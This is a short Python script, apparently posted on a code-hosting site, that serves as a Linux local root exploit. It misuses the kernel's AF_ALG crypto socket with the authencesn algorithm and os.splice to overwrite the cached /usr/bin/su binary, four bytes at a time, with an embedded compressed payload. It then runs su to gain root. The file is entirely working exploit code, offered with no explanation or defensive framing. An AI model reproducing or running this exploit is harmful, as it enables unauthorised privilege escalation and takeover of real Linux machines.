0xVoodoo
39 lines
1.2 KiB
Python
39 lines
1.2 KiB
Python
import os, zlib, socket
|
|
|
|
|
|
def exploit(payload, su_file, counter):
|
|
|
|
listener = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET)
|
|
listener.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
|
|
|
|
listener.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, bytes.fromhex('0800010000000010'+'0'*64))
|
|
listener.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE, None, 4)
|
|
|
|
connection, _ = listener.accept()
|
|
|
|
connection.sendmsg([b"A"*4+payload], [(socket.SOL_ALG, 3, b'\x00'*4), (socket.SOL_ALG, 2, b'\x10'+b'\x00'*19), (socket.SOL_ALG, 4, b'\x08' + b'\x00' * 3),], 32768)
|
|
|
|
stdin, stdout = os.pipe()
|
|
|
|
os.splice(su_file, stdout, counter + 4, offset_src=0)
|
|
os.splice(stdin, connection.fileno(), counter + 4)
|
|
|
|
try:
|
|
connection.recv(8 + counter)
|
|
except:
|
|
0
|
|
|
|
if __name__ == "__main__":
|
|
|
|
payload = zlib.decompress(bytes.fromhex("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
|
|
|
|
su_file = os.open("/usr/bin/su", 0)
|
|
|
|
i = 0
|
|
|
|
while i < len(payload):
|
|
exploit(payload[i:i+4], su_file, i)
|
|
i += 4
|
|
|
|
os.system("su")
|